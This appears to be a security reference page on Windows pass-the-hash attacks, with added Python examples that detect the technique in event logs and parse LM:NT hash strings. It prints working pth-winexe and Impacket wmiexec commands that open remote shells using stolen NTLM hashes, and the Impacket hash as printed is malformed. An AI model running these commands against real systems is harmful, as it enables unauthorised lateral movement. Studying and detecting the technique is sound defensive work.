Pass the Hash

The pass-the-hash technique lets an attacker authenticate to another machine or service with a user's NTLM hash instead of the user's password. Most pass-the-hash (pth) tools work by creating and starting a Windows service on the target that hands back a command or PowerShell prompt.

This technique requires access to the special administrative share Admin$, which in turn requires local administrative rights on the target machine.
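Because these tools authenticate over the network with NTLM and then install a service to obtain their shell, that pairing is what a defender can look for in the Windows event log. The following is an added example, not from the original page: a simple correlation rule run over constructed sample events, flagging a 4624 network logon (Logon Type 3) with authentication package NTLM that is followed within 60 seconds by a 7045 service-install event attributed to the same account. Field names follow the Windows event-data names; the service name winexesvc and the resolved account on the 7045 record are assumptions made for the sample, not values taken from the page.

```python
from datetime import datetime, timedelta

# Constructed sample events in chronological order (not real logs). Keys mirror
# the event-data field names of Windows Security 4624 and System 7045 records;
# "User" on the 7045 record stands in for the SID in the event header,
# resolved to an account name (an assumption for this sample).
SAMPLE_EVENTS = [
    # Normal Kerberos network logon: should not be flagged.
    {"time": "2024-01-10T09:58:00", "id": 4624, "LogonType": 3,
     "AuthenticationPackageName": "Kerberos", "TargetDomainName": "P42",
     "TargetUserName": "Alice", "IpAddress": "192.168.1.50"},
    # NTLM network logon ...
    {"time": "2024-01-10T10:00:00", "id": 4624, "LogonType": 3,
     "AuthenticationPackageName": "NTLM", "TargetDomainName": "P42",
     "TargetUserName": "John", "IpAddress": "192.168.1.10"},
    # ... followed seconds later by a service install by the same account,
    # the trace pth-winexe style tools leave behind (service name assumed).
    {"time": "2024-01-10T10:00:04", "id": 7045, "ServiceName": "winexesvc",
     "ImagePath": "winexesvc.exe", "User": "P42\\John"},
    # NTLM logon with no service install afterwards: not flagged by this rule.
    {"time": "2024-01-10T10:05:00", "id": 4624, "LogonType": 3,
     "AuthenticationPackageName": "NTLM", "TargetDomainName": "P42",
     "TargetUserName": "svc_backup", "IpAddress": "192.168.1.20"},
    # Service install long after any NTLM logon (software deployment): no alert.
    {"time": "2024-01-10T11:30:00", "id": 7045, "ServiceName": "UpdaterSvc",
     "ImagePath": "C:\\Program Files\\Updater\\updater.exe", "User": "P42\\svc_backup"},
]

WINDOW = timedelta(seconds=60)


def _ts(event):
    return datetime.fromisoformat(event["time"])


def is_ntlm_network_logon(event):
    """4624 with Logon Type 3 (network) authenticated via NTLM: the logon a
    remote pass-the-hash tool produces on the target."""
    return (event["id"] == 4624 and event["LogonType"] == 3
            and event["AuthenticationPackageName"].upper() == "NTLM")


def find_pth_candidates(events, window=WINDOW):
    """Return one alert per NTLM network logon that is followed within `window`
    by a 7045 service installation attributed to the same account."""
    events = sorted(events, key=_ts)
    alerts = []
    for i, logon in enumerate(events):
        if not is_ntlm_network_logon(logon):
            continue
        account = f"{logon['TargetDomainName']}\\{logon['TargetUserName']}".lower()
        for later in events[i + 1:]:
            gap = _ts(later) - _ts(logon)
            if gap > window:
                break  # events are sorted; nothing further can fall in the window
            if later["id"] == 7045 and later["User"].lower() == account:
                alerts.append({
                    "account": account,
                    "source_ip": logon["IpAddress"],
                    "service": later["ServiceName"],
                    "image": later["ImagePath"],
                    "seconds_between": gap.total_seconds(),
                })
                break
    return alerts


if __name__ == "__main__":
    for alert in find_pth_candidates(SAMPLE_EVENTS):
        print("possible pass-the-hash:", alert)
```

Only the John logon is flagged: the Kerberos logon is ignored, and the svc_backup NTLM logon has no service install within the window. In a real deployment the same rule would run over events collected from every host, and the source IP of the 4624 record is the pivot for finding the machine the hash was used from.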

The following command can be used to connect to a system using the NTLM hash:

pth-winexe -U John%aad3b435b51404eeaad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e //192.168.1.19 cmd

In the command above, if the user belongs to a domain, the username must be prefixed with the domain name, e.g. "p42/John".

The string "aad3b435b51404eeaad3b435b51404ee" is the LM hash of an empty password ('no password').

The same attack can be performed using Impacket:

/usr/bin/impacket-wmiexec -hashes :08KDA34CDZ85D7A80E2EA3B9F05C415D Administrator@192.168.1.63
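Both tools take the hash in the LM:NT form shown above (pth-winexe as user%LM:NT, Impacket as -hashes LM:NT with the LM half optional). The following added example, not from the original page, parses and sanity-checks those strings: it splits the two halves, requires each to be 32 hex characters, and reports when a half is the empty-password value. The empty-password NT hash constant is a well-known value I have added; the rest of the constants come from the page.

```python
import re

# LM hash of the empty password: what dumps show when no LM hash is stored.
EMPTY_LM_HASH = "aad3b435b51404eeaad3b435b51404ee"
# NT hash of the empty password (MD4 of the empty UTF-16LE string); well-known value, not from the page.
EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"
_HEX32 = re.compile(r"^[0-9a-f]{32}$")


def parse_hash_pair(text):
    """Parse an 'LM:NT' string. The LM half may be empty (Impacket's ':NT'
    form, since NTLMv2 never uses it). Returns (lm, nt, notes) with both
    halves lower-cased; raises ValueError when a half is not 32 hex characters."""
    if text.count(":") != 1:
        raise ValueError("expected exactly one ':' separating the LM and NT hashes")
    lm, nt = (part.strip().lower() for part in text.split(":"))
    notes = []
    if lm == "":
        notes.append("LM hash omitted")
    elif not _HEX32.match(lm):
        raise ValueError(f"LM hash is not 32 hex characters: {lm!r}")
    elif lm == EMPTY_LM_HASH:
        notes.append("LM hash is the empty-password value (no LM hash stored)")
    if not _HEX32.match(nt):
        raise ValueError(f"NT hash is not 32 hex characters: {nt!r}")
    if nt == EMPTY_NT_HASH:
        notes.append("NT hash is the empty-password value (account has a blank password)")
    return lm, nt, notes


def parse_winexe_credential(cred):
    """Parse pth-winexe's '[DOMAIN/]user%LM:NT' credential string into a dict.
    A backslash domain separator (DOMAIN\\user) is accepted as well."""
    if "%" not in cred:
        raise ValueError("expected [DOMAIN/]user%LM:NT")
    principal, hashes = cred.split("%", 1)
    domain, _, user = principal.replace("\\", "/").rpartition("/")  # '' when no domain given
    lm, nt, notes = parse_hash_pair(hashes)
    return {"domain": domain or None, "user": user, "lm": lm, "nt": nt, "notes": notes}


if __name__ == "__main__":
    # The pth-winexe credential from this page (constructed sample values).
    print(parse_winexe_credential(
        "p42/John%aad3b435b51404eeaad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e"))
```

Run against the credential in the pth-winexe command, the parser reports the LM half as the empty-password value, which is the expected state on any modern Windows host where LM hashes are not stored. Run against the Impacket hash exactly as printed above, it raises ValueError, because that string contains characters (K, Z) that cannot occur in a hex-encoded NT hash.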
